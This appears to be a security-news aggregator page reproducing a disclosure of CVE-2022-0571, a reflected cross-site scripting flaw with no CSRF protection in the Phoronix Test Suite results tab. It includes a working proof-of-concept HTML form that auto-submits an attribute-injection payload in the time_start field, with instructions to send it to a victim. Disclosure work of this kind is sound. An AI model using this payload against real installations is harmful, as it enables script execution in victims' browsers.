Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-0571: Cross-site Scripting (XSS) - Reflected in phoronix-test-suite

Cross-site Scripting (XSS) - Reflected in GitHub repository phoronix-test-suite/phoronix-test-suite prior to 10.8.2.

CVE
Open in Source
#xss#csrf#vulnerability#git

Description

Hi, i found a Reflected XSS vulnerability (POST based XSS + no CSRF token) in phoronix test suite, Results tab.

Proof of Concept

Install a local instance of phoronix
create a Search results form like this:
// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8222/?results" method="POST">
      <input type="hidden" name="time_start" value="2022&#45;02&#45;08&quot;onfocus&#61;&quot;confirm&#40;origin&#41;&quot;autofocus&#61;&quot;" />
      <input type="hidden" name="time_end" value="2022-02-09" />
      <input type="hidden" name="containing_tests" value="testt" />
      <input type="hidden" name="result_limit" value="100" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
//
and send to victim. Victim click on the link resulting reflected cross site scripting.

Impact

This vulnerability is capable of Reflected XSS

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE